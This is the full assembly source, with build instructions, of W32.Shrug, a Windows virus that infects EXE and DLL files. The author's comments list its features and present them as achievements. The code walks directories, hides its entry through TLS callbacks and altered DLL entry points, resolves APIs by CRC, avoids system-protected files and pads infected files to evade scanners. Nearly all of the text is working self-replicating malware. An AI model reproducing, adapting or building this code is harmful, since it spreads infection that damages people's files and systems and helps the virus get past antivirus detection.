ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SHRUG.ASM]ÄÄÄ comment ;) W32.Shrug by roy g biv some of its features: - parasitic direct action infector of PE exe/dll (but not looking at suffix) - infects files in current directory and all subdirectories - directory traversal is linked-list instead of recursive to reduce stack size - reloc section inserter/last section appender - mixture of EPO and standard transfer of control: TLS infection (but runs only under NT/2000/XP) altered entry point field in DLLs (all platforms) code executes after ExitProcess() is called - auto function type selection (Unicode under NT/2000/XP, ANSI under 9x/Me) - uses CRCs instead of API names - uses SEH for common code exit - section attributes are not always altered (virus is not self-modifying) - no infect files with data outside of image (eg self-extractors) - no infect files protected by SFC/SFP (including under Windows XP) - infected files are padded by random amounts to confuse tail scanners - uses SEH walker to find kernel address (no hard-coded addresses) - correct file checksum without using imagehlp.dll :) 100% correct algorithm - plus some new code optimisations that were never seen before --- optimisation tip: Windows appends ".dll" automatically, so this works: push "cfs" push esp call LoadLibraryA --- to build this thing: tasm ---- tasm32 /ml /m3 shrug tlink32 /B:400000 /x shrug,,,import32 Virus is not self-modifying, so no need to alter section attributes --- We're in the middle of a phase transition: a butterfly flapping its wings at just the right moment could cause a storm to happen. -I'm trying to understand- I'm at a moment in my life- I don't know where to flap my wings. (Danny Hillis) (; .386 .model flat extern GetCurrentProcess:proc extern WriteProcessMemory:proc extern MessageBoxA:proc extern ExitProcess:proc .data ;must be reverse alphabetical order because they are stored on stack ;API names are not present in replications, only in dropper krnnames db "UnmapViewOfFile" , 0 db "SetFileTime" , 0 db "SetFileAttributesW" , 0 db "SetFileAttributesA" , 0 db "SetCurrentDirectoryW", 0 db "SetCurrentDirectoryA", 0 db "MultiByteToWideChar" , 0 db "MapViewOfFile" , 0 db "LoadLibraryA" , 0 db "GlobalFree" , 0 db "GlobalAlloc" , 0 db "GetVersion" , 0 db "GetTickCount" , 0 db "GetFullPathNameW" , 0 db "GetFullPathNameA" , 0 db "FindNextFileW" , 0 db "FindNextFileA" , 0 db "FindFirstFileW" , 0 db "FindFirstFileA" , 0 db "FindClose" , 0 db "CreateFileW" , 0 db "CreateFileMappingA" , 0 db "CreateFileA" , 0 db "CloseHandle" , 0 sfcnames db "SfcIsFileProtected", 0 txttitle db "Shrug", 0 txtbody db "running...", 0 include shrug.inc .code assume fs:nothing dropper label near mov edx, krncrc_count mov ebx, offset krnnames mov edi, offset krncrcbegin call create_crcs mov edx, 1 mov ebx, offset sfcnames mov edi, offset sfccrcbegin call create_crcs call patch_host xor ebx, ebx push ebx push offset txttitle push offset txtbody push ebx call MessageBoxA push ebx call ExitProcess create_crcs proc near imul ebp, edx, 4 create_loop label near or eax, -1 create_outer label near xor al, byte ptr [ebx] push 8 pop ecx create_inner label near add eax, eax jnb create_skip xor eax, 4c11db7h ;use generator polymonial (see IEEE 802) create_skip label near loop create_inner sub cl, byte ptr [ebx] ;carry set if not zero inc ebx ;carry not altered by inc jb create_outer push eax dec edx jne create_loop mov eax, esp push ecx push ebp push eax push edi call GetCurrentProcess push eax xchg esi, eax call WriteProcessMemory add esp, ebp ret create_crcs endp patch_host label near pop ecx push ecx call $ + 5 pop eax add eax, offset tlsdata - offset $ + 1 sub ecx, eax push ecx mov eax, esp xor edi, edi push edi push 4 push eax push offset host_patch + 3 push esi call WriteProcessMemory push edi ;fake Reserved push edi ;fake Reason push edi ;fake DLLHandle push edi ;fake return address ;----------------------------------------------------------------------------- ;everything before this point is dropper code ;----------------------------------------------------------------------------- ;----------------------------------------------------------------------------- ;virus code begins here in dlls (always) and exes (existing TLS callback pointer) ;----------------------------------------------------------------------------- shrug_tlscode proc near mov eax, dword ptr [esp + initstk.initReason] push eax ;fake Reserved push eax ;real Reason push eax ;fake DLLHandle call host_patch ;real return address tlsdata tlsstruc <0> ;label required for delta offset ;----------------------------------------------------------------------------- ;moved label after some data because "e800000000" looks like virus code ;) ;and it's not used for delta offset calculation, but for original entry point ;----------------------------------------------------------------------------- host_patch label near add dword ptr [esp], '!bgr' ;----------------------------------------------------------------------------- ;virus code begins here in exes (created TLS directory / callback pointer) ;----------------------------------------------------------------------------- shrug_dllcode proc near ;stack = DllHandle, Reason, Reserved test byte ptr [esp + initstk.initReason], DLL_PROCESS_ATTACH or DLL_THREAD_ATTACH jne shrug_dllret ;kernel32 not in SEH chain on ATTACH messages pushad call shrug_common mov esp, dword ptr [esp + sehstruc.sehprevseh] xor eax, eax pop dword ptr fs:[eax] pop eax popad shrug_dllret label near ret 0ch ;----------------------------------------------------------------------------- ;main virus body. everything happens in here ;----------------------------------------------------------------------------- shrug_common proc near xor esi, esi lods dword ptr fs:[esi] push eax mov dword ptr fs:[esi - 4], esp inc eax walk_seh label near dec eax xchg esi, eax lods dword ptr [esi] inc eax jne walk_seh enter (size findlist - 5) and -4, 0 ;Windows NT/2000/XP enables alignment check exception ;so some APIs fail if buffer is not dword aligned ;-5 to align at 2 dwords earlier ;because EBP saved automatically ;and other register saved next push eax ;zero findprev in findlist lods dword ptr [esi] call init_findmz ;----------------------------------------------------------------------------- ;API CRC table, null terminated ;----------------------------------------------------------------------------- krncrcbegin label near ;place < 80h bytes from call for smaller code dd (krncrc_count + 1) dup (0) krncrcend label near dd offset check_sfc - offset krncrcend + 4 db "Shrug - roy g biv" ;your guess is as good as mine init_findmz label near inc eax xchg edi, eax find_mzhdr label near ;----------------------------------------------------------------------------- ;do not use hard-coded kernel address values because it is not portable ;Microsoft used all different values for 95, 98, NT, 2000, Me, XP ;they will maybe change again for every new release ;----------------------------------------------------------------------------- dec edi ;sub 64kb xor di, di ;64kb align call is_pehdr jne find_mzhdr mov ebx, edi pop edi ;----------------------------------------------------------------------------- ;parse export table ;----------------------------------------------------------------------------- mov esi, dword ptr [esi + pehdr.peexport.dirrva - pehdr.pecoff] lea esi, dword ptr [ebx + esi + peexp.expadrrva] lods dword ptr [esi] ;Export Address Table RVA lea edx, dword ptr [ebx + eax] lods dword ptr [esi] ;Name Pointer Table RVA lea ecx, dword ptr [ebx + eax] lods dword ptr [esi] ;Ordinal Table RVA lea ebp, dword ptr [ebx + eax] mov esi, ecx push_export label near push ecx get_export label near lods dword ptr [esi] push ebx add ebx, eax ;Name Pointer VA or eax, -1 crc_outer label near xor al, byte ptr [ebx] push 8 pop ecx crc_inner label near add eax, eax jnb crc_skip xor eax, 4c11db7h ;use generator polymonial (see IEEE 802) crc_skip label near loop crc_inner sub cl, byte ptr [ebx] ;carry set if not zero inc ebx ;carry not altered by inc jb crc_outer pop ebx cmp dword ptr [edi], eax jne get_export ;----------------------------------------------------------------------------- ;exports must be sorted alphabetically, otherwise GetProcAddress() would fail ;this allows to push addresses onto the stack, and the order is known ;----------------------------------------------------------------------------- pop ecx mov eax, esi sub eax, ecx ;Name Pointer Table VA shr eax, 1 movzx eax, word ptr [ebp + eax - 2] ;get export ordinal mov eax, dword ptr [eax * 4 + edx] ;get export RVA add eax, ebx push eax scas dword ptr [edi] cmp dword ptr [edi], 0 jne push_export add edi, dword ptr [edi + 4] jmp edi ;----------------------------------------------------------------------------- ;get SFC support if available ;----------------------------------------------------------------------------- check_sfc label near call load_sfc db "sfc_os", 0 ;Windows XP (forwarder chain from sfc.dll) load_sfc label near call dword ptr [esp + krncrcstk.kLoadLibraryA] test eax, eax jne found_sfc push 'cfs' ;Windows Me/2000 push esp call dword ptr [esp + 4 + krncrcstk.kLoadLibraryA] pop ecx test eax, eax je sfcapi_push found_sfc label near call init_findmz ;----------------------------------------------------------------------------- ;API CRC table, null terminated ;----------------------------------------------------------------------------- sfccrcbegin label near ;place < 80h bytes from call for smaller code dd 0, 0 sfccrcend label near dd offset swap_create - offset sfccrcend + 4 sfcapi_push label near push eax swap_create label near ;----------------------------------------------------------------------------- ;swap CreateFileW and CreateFileMappingA because of alphabet order ;----------------------------------------------------------------------------- mov ebx, esp mov eax, dword ptr [ebx + krncrcstk.kCreateFileMappingA] xchg dword ptr [ebx + krncrcstk.kCreateFileW], eax mov dword ptr [ebx + krncrcstk.kCreateFileMappingA], eax ;----------------------------------------------------------------------------- ;determine platform and dynamically select function types (ANSI or Unicode) ;so for Windows NT/2000/XP this code handles files that no ANSI function can open ;----------------------------------------------------------------------------- call dword ptr [ebx + krncrcstk.kGetVersion] shr eax, 1fh ;treat 9x and Win32s as ANSI ;safer than using AreFileApisANSI() lea ebp, dword ptr [eax * 4 + ebx] lea esi, dword ptr [ebx + size krncrcstk] ;----------------------------------------------------------------------------- ;non-recursive directory traverser ;----------------------------------------------------------------------------- scan_dir proc near ;ebp -> platform APIs, esi -> findlist push '*' ;ANSI-compatible Unicode findmask mov eax, esp lea ebx, dword ptr [esi + findlist.finddata] push ebx push eax call dword ptr [ebp + krncrcstk.kFindFirstFileW] pop ecx mov dword ptr [esi + findlist.findhand], eax inc eax je find_prev ;you must always step forward from where you stand test_dirfile label near mov eax, dword ptr [ebx + WIN32_FIND_DATA.dwFileAttributes] lea edi, dword ptr [esi + findlist.finddata.cFileName] test al, FILE_ATTRIBUTE_DIRECTORY je test_file cmp byte ptr [edi], '.' ;ignore . and .. (but also .* directories under NT/2000/XP) je find_next ;----------------------------------------------------------------------------- ;enter subdirectory, and allocate another list node ;----------------------------------------------------------------------------- push edi call dword ptr [ebp + krncrcstk.kSetCurrentDirectoryW] xchg ecx, eax jecxz find_next push size findlist push GMEM_FIXED call dword ptr [esp + krncrcstk.kGlobalAlloc + 8] xchg ecx, eax jecxz step_updir xchg esi, ecx mov dword ptr [esi + findlist.findprev], ecx jmp scan_dir find_next label near lea ebx, dword ptr [esi + findlist.finddata] push ebx mov edi, dword ptr [esi + findlist.findhand] push edi call dword ptr [ebp + krncrcstk.kFindNextFileW] test eax, eax jne test_dirfile ;----------------------------------------------------------------------------- ;close find, and free list node if not list head ;----------------------------------------------------------------------------- mov ebx, esp push edi call dword ptr [ebx + krncrcstk.kFindClose] find_prev label near mov ecx, dword ptr [esi + findlist.findprev] jecxz shrug_exit push esi mov esi, ecx call dword ptr [ebx + krncrcstk.kGlobalFree] step_updir label near ;----------------------------------------------------------------------------- ;the ANSI string ".." can be used, even on Unicode platforms ;----------------------------------------------------------------------------- push '..' org $ - 1 ;select top 8 bits of push shrug_exit label near int 3 ;game over push esp call dword ptr [ebx + krncrcstk.kSetCurrentDirectoryA] pop eax jmp find_next test_file label near ;----------------------------------------------------------------------------- ;get full path and convert to Unicode if required (SFC requires Unicode path) ;----------------------------------------------------------------------------- push eax ;save original file attributes for close mov eax, ebp enter MAX_PATH * 2, 0 mov ecx, esp push eax push esp push ecx push MAX_PATH push edi call dword ptr [eax + krncrcstk.kGetFullPathNameW] xchg edi, eax pop eax xor ebx, ebx call dword ptr [ebp + 8 + krncrcstk.kGetVersion] test eax, eax jns call_sfcapi mov ecx, esp xchg ebp, eax enter MAX_PATH * 2, 0 xchg ebp, eax mov eax, esp push MAX_PATH push eax inc edi push edi push ecx push ebx ;use default translation push ebx ;CP_ANSI call dword ptr [ebp + 8 + krncrcstk.kMultiByteToWideChar] call_sfcapi label near ;----------------------------------------------------------------------------- ;don't touch protected files ;----------------------------------------------------------------------------- mov ecx, dword ptr [ebp + 8 + krncrcstk.kSfcIsFileProtected] xor eax, eax ;fake success in case of no SFC jecxz leave_sfc push esp push ebx call ecx leave_sfc label near leave test eax, eax jne restore_attr call set_fileattr push ebx push ebx push OPEN_EXISTING push ebx push ebx push GENERIC_READ or GENERIC_WRITE push edi call dword ptr [ebp + krncrcstk.kCreateFileW] xchg ebx, eax call test_infect db 81h ;mask CALL call infect_file ;Super Nashwan power ;) close_file label near ;label required for delta offset lea eax, dword ptr [esi + findlist.finddata.ftLastWriteTime] push eax sub eax, 8 push eax sub eax, 8 push eax push ebx call dword ptr [esp + 4 + krncrcstk.kSetFileTime + 10h] push ebx call dword ptr [esp + 4 + krncrcstk.kCloseHandle + 4] restore_attr label near pop ebx ;restore original file attributes call set_fileattr jmp find_next scan_dir endp ;----------------------------------------------------------------------------- ;look for MZ and PE file signatures ;----------------------------------------------------------------------------- is_pehdr proc near ;edi -> map view cmp word ptr [edi], 'ZM' ;Windows does not check 'MZ' jne pehdr_ret mov esi, dword ptr [edi + mzhdr.mzlfanew] add esi, edi lods dword ptr [esi] ;SEH protects against bad lfanew value add eax, -'EP' ;anti-heuristic test filetype ;) and clear EAX pehdr_ret label near ret ;if PE file, then eax = 0, esi -> COFF header, Z flag set is_pehdr endp ;----------------------------------------------------------------------------- ;reset/set read-only file attribute ;----------------------------------------------------------------------------- set_fileattr proc near ;ebx = file attributes, esi -> findlist, ebp -> platform APIs push ebx lea edi, dword ptr [esi + findlist.finddata.cFileName] push edi call dword ptr [ebp + krncrcstk.kSetFileAttributesW] ret ;edi -> filename db "01/01/01" ;01 Janvier, 1901 - the old joke set_fileattr endp ;----------------------------------------------------------------------------- ;test if file is infectable (not protected, PE, x86, non-system, not infected, etc) ;----------------------------------------------------------------------------- test_infect proc near ;esi = find data, edi = map view, ebp -> platform APIs call map_view mov ebp, esi call is_pehdr jne inftest_ret lods dword ptr [esi] cmp ax, IMAGE_FILE_MACHINE_I386 jne inftest_ret ;only Intel 386+ shr eax, 0dh ;move high 16 bits into low 16 bits and multiply by 8 lea edx, dword ptr [eax * 4 + eax] ;complete multiply by 28h (size pesect) mov ecx, dword ptr [esi + pehdr.pecoff.peflags - pehdr.pecoff.petimedate] ;----------------------------------------------------------------------------- ;IMAGE_FILE_BYTES_REVERSED_* bits are rarely set correctly, so do not test them ;----------------------------------------------------------------------------- test ch, (IMAGE_FILE_SYSTEM or IMAGE_FILE_UP_SYSTEM_ONLY) shr 8 jne inftest_ret add esi, pehdr.peentrypoint - pehdr.pecoff.petimedate ;----------------------------------------------------------------------------- ;if file is a .dll, then we require an entry point function ;----------------------------------------------------------------------------- lods dword ptr [esi] xchg ecx, eax test ah, IMAGE_FILE_DLL shr 8 je test_system jecxz inftest_ret ;----------------------------------------------------------------------------- ;32-bit executable file... ;----------------------------------------------------------------------------- test_system label near and ax, IMAGE_FILE_EXECUTABLE_IMAGE or IMAGE_FILE_32BIT_MACHINE cmp ax, IMAGE_FILE_EXECUTABLE_IMAGE or IMAGE_FILE_32BIT_MACHINE jne inftest_ret ;cannot use xor+jpo because 0 is also jpe ;----------------------------------------------------------------------------- ;the COFF magic value is not checked because Windows ignores it anyway ;IMAGE_FILE_MACHINE_IA64 machine type is the only reliable way to detect PE32+ ;----------------------------------------------------------------------------- mov eax, dword ptr [esi + pehdr.pesubsys - pehdr.pecodebase] cmp ax, IMAGE_SUBSYSTEM_WINDOWS_CUI jnbe inftest_ret cmp al, IMAGE_SUBSYSTEM_WINDOWS_GUI ;al not ax, because ah is known now to be 0 jb inftest_ret shr eax, 1eh ;test eax, IMAGE_DLLCHARACTERISTICS_WDM_DRIVER shl 10h jb inftest_ret ;----------------------------------------------------------------------------- ;avoid files which seem to contain attribute certificates ;because one of those certificates might be a digital signature ;----------------------------------------------------------------------------- cmp dword ptr [esi + pehdr.pesecurity.dirrva - pehdr.pecodebase], 0 jne inftest_ret ;----------------------------------------------------------------------------- ;cannot use the NumberOfRvaAndSizes field to calculate the Optional Header size ;the Optional Header can be larger than the offset of the last directory ;remember: even if you have not seen it does not mean that it does not happen :) ;----------------------------------------------------------------------------- movzx eax, word ptr [esi + pehdr.pecoff.peopthdrsize - pehdr.pecodebase] add eax, edx lea esi, dword ptr [esi + eax - pehdr.pecodebase + pehdr.pemagic - size pesect + pesect.sectrawsize] lods dword ptr [esi] add eax, dword ptr [esi] cmp dword ptr [ebp + findlist.finddata.dwFileSizeLow], eax jne inftest_ret ;file contains appended data inc dword ptr [esp + mapsehstk.mapsehinfret] ;skip call mask inftest_ret label near int 3 ;----------------------------------------------------------------------------- ;increase file size by random value (between RANDPADMIN and RANDPADMAX bytes) ;I use GetTickCount() instead of RDTSC because RDTSC can be made privileged ;----------------------------------------------------------------------------- open_append proc near call dword ptr [esp + size mapstack - 4 + krncrcstk.kGetTickCount] and eax, RANDPADMAX - 1 add ax, small (offset shrug_codeend - offset shrug_tlscode + RANDPADMIN) ;----------------------------------------------------------------------------- ;create file map, and map view if successful ;----------------------------------------------------------------------------- map_view proc near ;eax = extra bytes to map, ebx = file handle, esi -> findlist, ebp -> platform APIs add eax, dword ptr [esi + findlist.finddata.dwFileSizeLow] xor ecx, ecx push eax mov edx, esp push eax ;MapViewOfFile push ecx ;MapViewOfFile push ecx ;MapViewOfFile push FILE_MAP_WRITE ;Windows 9x/Me does not support FILE_MAP_ALL_ACCESS push ecx push eax push ecx push PAGE_READWRITE push ecx push ebx call dword ptr [edx + size mapstack + krncrcstk.kCreateFileMappingA] ;ANSI map is allowed because of no name push eax xchg edi, eax call dword ptr [esp + size mapstack + krncrcstk.kMapViewOfFile + 14h] pop ecx xchg edi, eax ;should succeed even if file cannot be opened pushad call unmap_seh mov esp, dword ptr [esp + sehstruc.sehprevseh] xor eax, eax pop dword ptr fs:[eax] pop eax popad ;SEH destroys all registers push eax push edi call dword ptr [esp + size mapstack + krncrcstk.kUnmapViewOfFile + 4] call dword ptr [esp + size mapstack + krncrcstk.kCloseHandle] pop eax ret unmap_seh proc near cdq push dword ptr fs:[edx] mov dword ptr fs:[edx], esp jmp dword ptr [esp + mapsehstk.mapsehsehret] unmap_seh endp map_view endp ;eax = map handle, ecx = new file size, edi = map view open_append endp ;----------------------------------------------------------------------------- ;infect file using a selection of styles for variety ;algorithm: increase file size by random amount (RANDPADMIN-RANDPADMAX ; bytes) to confuse scanners that look at end of file (also ; infection marker) ; if reloc table is not in last section (taken from relocation ; field in PE header, not section name), then append to last ; section. otherwise, move relocs down and insert code into ; space (to confuse people looking at end of file. they will ; see only relocation data and garbage or many zeroes) ;DLL infection: entry point is altered to point to virus code. very simple ;EXE infection: Entry Point Obscured via TLS callback function ; if no TLS directory exists, then one will be created, with a ; single callback function that points to this code ; if a TLS directory exists, but no callback functions exist, ; then a function pointer will be created that points to this ; code ; else if a TLS directory and callback functions exist, then the ; first function pointer will be altered to point to this code ;----------------------------------------------------------------------------- infect_file label near ;esi -> findlist, edi = map view call open_append delta_label label near push ecx push edi mov ebx, dword ptr [edi + mzhdr.mzlfanew] lea ebx, dword ptr [ebx + edi + pehdr.pechksum] movzx eax, word ptr [ebx + pehdr.pecoff.pesectcount - pehdr.pechksum] imul eax, eax, size pesect movzx ecx, word ptr [ebx + pehdr.pecoff.peopthdrsize - pehdr.pechksum] add eax, ecx lea esi, dword ptr [ebx + eax + pehdr.pemagic - pehdr.pechksum - size pesect + pesect.sectrawsize] lods dword ptr [esi] mov cx, offset shrug_codeend - offset shrug_tlscode mov edx, dword ptr [ebx + pehdr.pefilealign - pehdr.pechksum] push eax add eax, ecx dec edx add eax, edx not edx and eax, edx ;file align last section mov dword ptr [esi + pesect.sectrawsize - pesect.sectrawaddr], eax ;----------------------------------------------------------------------------- ;raw size is file aligned. virtual size is not required to be section aligned ;so if old virtual size is larger than new raw size, then size of image does ;not need to be updated, else virtual size must be large enough to cover the ;new code, and size of image is section aligned ;----------------------------------------------------------------------------- mov ebp, dword ptr [esi + pesect.sectvirtaddr - pesect.sectrawaddr] cmp dword ptr [esi + pesect.sectvirtsize - pesect.sectrawaddr], eax jnb test_reloff mov dword ptr [esi + pesect.sectvirtsize - pesect.sectrawaddr], eax add eax, ebp mov edx, dword ptr [ebx + pehdr.pesectalign - pehdr.pechksum] dec edx add eax, edx not edx and eax, edx mov dword ptr [ebx + pehdr.peimagesize - pehdr.pechksum], eax ;----------------------------------------------------------------------------- ;if relocation table is not in last section, then append to last section ;otherwise, move relocations down and insert code into space ;----------------------------------------------------------------------------- test_reloff label near test byte ptr [ebx + pehdr.pecoff.peflags - pehdr.pechksum], IMAGE_FILE_RELOCS_STRIPPED jne copy_code cmp dword ptr [ebx + pehdr.pereloc.dirrva - pehdr.pechksum], ebp jb copy_code mov eax, dword ptr [esi + pesect.sectvirtsize - pesect.sectrawaddr] add eax, ebp cmp dword ptr [ebx + pehdr.pereloc.dirrva - pehdr.pechksum], eax jnb copy_code add dword ptr [ebx + pehdr.pereloc.dirrva - pehdr.pechksum], ecx pop eax push esi add edi, dword ptr [esi] lea esi, dword ptr [edi + eax - 1] lea edi, dword ptr [esi + ecx] xchg ecx, eax std rep movs byte ptr [edi], byte ptr [esi] cld pop esi pop edi push edi push ecx xchg ecx, eax copy_code label near pop edx add ebp, edx xchg ebp, eax add edx, dword ptr [esi] add edi, edx push esi push edi mov esi, offset shrug_tlscode - offset delta_label add esi, dword ptr [esp + infectstk.infseh.mapsehinfret] ;delta offset rep movs byte ptr [edi], byte ptr [esi] pop edi pop esi ;----------------------------------------------------------------------------- ;always alter entry point of dlls ;----------------------------------------------------------------------------- test byte ptr [ebx + pehdr.pecoff.peflags - pehdr.pechksum + 1], IMAGE_FILE_DLL shr 8 je test_tlsdir lea edx, dword ptr [ebx + pehdr.peentrypoint - pehdr.pechksum] alter_func label near xchg dword ptr [edx], eax sub eax, offset tlsdata - offset shrug_tlscode sub eax, dword ptr [edx] mov dword ptr [edi + offset host_patch - offset shrug_tlscode + 3], eax jmp checksum_file ;----------------------------------------------------------------------------- ;if tls directory exists... ;----------------------------------------------------------------------------- test_tlsdir label near mov ecx, dword ptr [ebx + pehdr.petls.dirrva - pehdr.pechksum] jecxz add_tlsdir ;size field is never checked call rva2raw pop edx push edx add eax, dword ptr [ebx + pehdr.peimagebase - pehdr.pechksum] push eax lea eax, dword ptr [edx + ecx + tlsstruc.tlsfuncptr] mov ecx, dword ptr [eax] jecxz store_func sub ecx, dword ptr [ebx + pehdr.peimagebase - pehdr.pechksum] call rva2raw add edx, ecx ;do not combine mov ecx, dword ptr [edx] ;current edx used by alter_func ;it is impossible if it passes unattempted store_func label near test ecx, ecx pop ecx xchg ecx, eax jne alter_func add eax, offset tlsdata.tlsfunc - offset shrug_tlscode mov dword ptr [ecx], eax add edi, offset tlsdata.tlsfiller - offset shrug_tlscode jmp set_funcptr ;----------------------------------------------------------------------------- ;the only time that the section attributes are altered is when a TLS directory ;is created. at that time, a writable dword must be available for the index. ;the alternative is to search for a writable section with virtual size > raw ;size, set index pointer to that address and reinitialise it to zero in code ;----------------------------------------------------------------------------- add_tlsdir label near or byte ptr [esi + pesect.sectflags - pesect.sectrawaddr + 3], IMAGE_SCN_MEM_WRITE shr 18h add eax, offset tlsdata - offset shrug_tlscode mov dword ptr [ebx + pehdr.petls.dirrva - pehdr.pechksum], eax add eax, dword ptr [ebx + pehdr.peimagebase - pehdr.pechksum] add eax, offset tlsdata.tlsflags - offset tlsdata add edi, offset tlsdata.tlsindex - offset shrug_tlscode stos dword ptr [edi] add eax, offset tlsdata.tlsfunc - offset tlsdata.tlsflags stos dword ptr [edi] set_funcptr label near scas dword ptr [edi] scas dword ptr [edi] add eax, offset shrug_dllcode - offset tlsdata.tlsfunc stos dword ptr [edi] checksum_file label near pop edi ;----------------------------------------------------------------------------- ;CheckSumMappedFile() - simply sum of all words in file, then adc filesize ;----------------------------------------------------------------------------- xor ecx, ecx xchg dword ptr [ebx], ecx jecxz infect_ret xor eax, eax pop ecx push ecx inc ecx shr ecx, 1 clc calc_checksum label near adc ax, word ptr [edi] inc edi inc edi loop calc_checksum pop dword ptr [ebx] adc dword ptr [ebx], eax ;avoid common bug. ADC not ADD infect_ret label near int 3 ;common exit using SEH db "*4U2NV*" ;that is, unless you're reading this test_infect endp ;----------------------------------------------------------------------------- ;convert relative virtual address to raw file offset ;----------------------------------------------------------------------------- rvaloop label near sub esi, size pesect cmp al, 'R' ;mask PUSH ESI org $ - 1 rva2raw proc near ;ecx = RVA, esi -> last section header push esi cmp dword ptr [esi + pesect.sectvirtaddr - pesect.sectrawaddr], ecx jnbe rvaloop sub ecx, dword ptr [esi + pesect.sectvirtaddr - pesect.sectrawaddr] add ecx, dword ptr [esi] pop esi ret rva2raw endp ;When last comes to last, ; I have little power: ; I am merely an urn. ;I hold the bone-sap of myself, ; And watch the marrow burn. ; ;When last comes to last, ; I have little strength: ; I am only a tool. ;I work its work; and in its hands ; I am the fool. ; ;When last comes to last, ; I have little life. ; I am simply a deed: ;an action done while courage holds: ; A seed. ;(Stephen Donaldson) shrug_codeend label near shrug_common endp shrug_dllcode endp shrug_tlscode endp end dropper ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SHRUG.ASM]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SHRUG.INC]ÄÄÄ MAX_PATH equ 260 DLL_PROCESS_ATTACH equ 1 DLL_THREAD_ATTACH equ 2 FILE_ATTRIBUTE_DIRECTORY equ 00000010h FILE_ATTRIBUTE_NORMAL equ 00000080h FILE_FLAG_RANDOM_ACCESS equ 10000000h GMEM_FIXED equ 0000h OPEN_EXISTING equ 3 GENERIC_WRITE equ 40000000h GENERIC_READ equ 80000000h IMAGE_FILE_MACHINE_I386 equ 14ch ;14d/14e do not exist. if you don't believe, then try it IMAGE_FILE_RELOCS_STRIPPED equ 0001h IMAGE_FILE_EXECUTABLE_IMAGE equ 0002h IMAGE_FILE_32BIT_MACHINE equ 0100h IMAGE_FILE_SYSTEM equ 1000h IMAGE_FILE_DLL equ 2000h IMAGE_FILE_UP_SYSTEM_ONLY equ 4000h IMAGE_SUBSYSTEM_WINDOWS_GUI equ 2 IMAGE_SUBSYSTEM_WINDOWS_CUI equ 3 IMAGE_SCN_MEM_WRITE equ 80000000h RANDPADMIN equ 4096 RANDPADMAX equ 2048 ;RANDPADMIN is added to this SECTION_MAP_WRITE equ 0002h FILE_MAP_WRITE equ SECTION_MAP_WRITE PAGE_READWRITE equ 04 align 1 ;byte-packed structures krncrcstk struct kSfcIsFileProtected dd ? ;appended from other location kUnmapViewOfFile dd ? kSetFileTime dd ? kSetFileAttributesW dd ? kSetFileAttributesA dd ? kSetCurrentDirectoryW dd ? kSetCurrentDirectoryA dd ? kMultiByteToWideChar dd ? kMapViewOfFile dd ? kLoadLibraryA dd ? kGlobalFree dd ? kGlobalAlloc dd ? kGetVersion dd ? kGetTickCount dd ? kGetFullPathNameW dd ? kGetFullPathNameA dd ? kFindNextFileW dd ? kFindNextFileA dd ? kFindFirstFileW dd ? kFindFirstFileA dd ? kFindClose dd ? kCreateFileMappingA dd ? kCreateFileW dd ? kCreateFileA dd ? kCloseHandle dd ? krncrcstk ends krncrc_count equ (size krncrcstk - 4) shr 2 tlsstruc struct tlsrawbeg dd ? tlsrawend dd ? tlsindex dd ? tlsfuncptr dd ? tlsfiller dd ? tlsflags dd ? tlsfunc dd 2 dup (?) tlsstruc ends initstk struct initret dd ? initDLLHandle dd ? initReason dd ? initReserved dd ? initstk ends sehstruc struct sehkrnlret dd ? sehexcptrec dd ? sehprevseh dd ? sehstruc ends FILETIME struct dwLowDateTime dd ? dwHighDateTime dd ? FILETIME ends WIN32_FIND_DATA struct dwFileAttributes dd ? ftCreationTime FILETIME ftLastAccessTime FILETIME ftLastWriteTime FILETIME dwFileSizeHigh dd ? dwFileSizeLow dd ? dwReserved0 dd ? dwReserved1 dd ? cFileName dw 260 dup (?) cAlternateFileName dw 14 dup (?) WIN32_FIND_DATA ends findlist struct findprev dd ? findhand dd ? finddata WIN32_FIND_DATA findlist ends coffhdr struct pemachine dw ? ;04 pesectcount dw ? ;06 petimedate dd ? ;08 pesymbrva dd ? ;0C pesymbcount dd ? ;10 peopthdrsize dw ? ;14 peflags dw ? ;16 coffhdr ends pedir struct dirrva dd ? dirsize dd ? pedir ends pehdr struct pesig dd ? ;00 pecoff coffhdr pemagic dw ? ;18 pemajorlink db ? ;1A peminorlink db ? ;1B pecodesize dd ? ;1C peidatasize dd ? ;20 peudatasize dd ? ;24 peentrypoint dd ? ;28 pecodebase dd ? ;2C pedatabase dd ? ;30 peimagebase dd ? ;34 pesectalign dd ? ;38 pefilealign dd ? ;3C pemajoros dw ? ;40 peminoros dw ? ;42 pemajorimage dw ? ;44 peminorimage dw ? ;46 pemajorsubsys dw ? ;48 peminorsubsys dw ? ;4A pereserved dd ? ;4C peimagesize dd ? ;50 pehdrsize dd ? ;54 pechksum dd ? ;58 pesubsys dw ? ;5C pedllflags dw ? ;5E pestackmax dd ? ;60 pestacksize dd ? ;64 peheapmax dd ? ;68 peheapsize dd ? ;6C peldrflags dd ? ;70 pervacount dd ? ;74 peexport pedir ;78 peimport pedir ;80 persrc pedir ;88 peexcpt pedir ;90 pesecurity pedir ;98 pereloc pedir ;A0 pedebug pedir ;A8 pearch pedir ;B0 peglobal pedir ;B8 petls pedir ;C0 peconfig pedir ;C8 pebound pedir ;D0 peiat pedir ;D8 pedelay pedir ;E0 pecom pedir ;E8 persrv pedir ;F0 pehdr ends peexp struct expflags dd ? expdatetime dd ? expmajorver dw ? expminorver dw ? expdllrva dd ? expordbase dd ? expadrcount dd ? expnamecount dd ? expadrrva dd ? expnamerva dd ? expordrva dd ? peexp ends mzhdr struct mzsig dw ? ;00 mzpagemod dw ? ;02 mzpagediv dw ? ;04 mzrelocs dw ? ;06 mzhdrsize dw ? ;08 mzminalloc dw ? ;0A mzmaxalloc dw ? ;0C mzss dw ? ;0E mzsp dw ? ;10 mzchksum dw ? ;12 mzip dw ? ;14 mzcs dw ? ;16 